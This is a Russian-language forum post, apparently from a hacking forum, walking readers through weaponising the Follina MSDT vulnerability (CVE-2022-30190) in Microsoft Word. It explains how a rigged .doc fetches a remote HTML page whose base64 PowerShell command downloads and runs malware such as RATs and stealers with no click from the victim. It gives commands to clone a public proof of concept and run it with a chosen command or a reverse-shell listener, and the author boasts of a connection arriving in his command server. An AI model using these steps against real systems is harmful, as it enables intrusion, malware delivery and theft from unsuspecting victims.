qq,сегодня поговорим об уязвимости msdt-follina CVE-2022-30190 Подробнее об самой уязвимости Короче коротко-и понятно, мистер робот создает вордовский док .doc, содержащий ссылку на вредоносный OLE-объект типо document.xml.rels который располгается на хостинге Html файл который внутри содержит код с помощью специальной URI-схемы. Уже подготовленный троян,rat,stiller,clipper, и т/д малварь при открытии запускает msdt-инструмент для устранения неполадок в винде.После этого мистер робот может через параметры передать этому инструменту любую команду для выполнения к пример powershell-команду для выполнения определенного дейсвтия, к примеру подгрузка малваря. Работает даже в том случаи если ДАЖЕ включен в защищенном режиме(подробнее будет внизу) Ну или кратко внутри document.xml.rels содержится вредоносный код который обращается к html расположенному на целевом хосте.Потом этот html файл внутри имеет себе закодированную в base64 команду powershell которая подгружает и запуксает малварь,жертва даже не должна будет нажимать на какие либо кнопки все произойдет на автомате при запуске документа. Фаза 1 Первое что мы делаем это загружаем уже готовый проект образца нашей фоллины Код: git clone https://github.com/JohnHammond/msdt-follina Code git clone https://github.com/JohnHammond/msdt-follina После установки переходим в директорию с самим данным образцом Фаза 2 Второе что мы делаем это запускам python скрипт с определнным параметром для того чтобы запустить прослушку порта или же я представлю вам несколько образцов для запуска Код: python3 follina.py -c "notepad" #запустить notepad при открытии документа[/B] python3 follina.py -r 9001 #запустить прослушку порта-при открытии будете получать реверс коннект Code python3 follina.py -c "notepad" #запустить notepad при открытии документа[/B] python3 follina.py -r 9001 #запустить прослушку порта-при открытии будете получать реверс коннект Фаза 3 Третье завершающее это ваш готовый малварь, открываете 2-ой терминал и переходите по тому же пути где вы скачали образцы фоллины.Там и будет ваш doc файл под именем "follina.doc" Потом можете чекнуть doc файл на virtual box. И при открытии на windows с wordом вы будете получать спойкойный реверс-коннект в cmd но я вам показал лишь основу этой уязвимости можно придумать еще кое что, сейчас я представлю обзор где я изменил фоллину на автоматический подгрузку файл, и последующий запуск что даст мне контроль над этим таргетом. Как видите в мою кобу пришел коннект через эту cve. Спасибо за чтение(видео с обзором уязвимости здесь )
Фолина детект полный сейчас выдает, появилась новая уязвимость - CVE-2023-21716, кому интересно, гляньте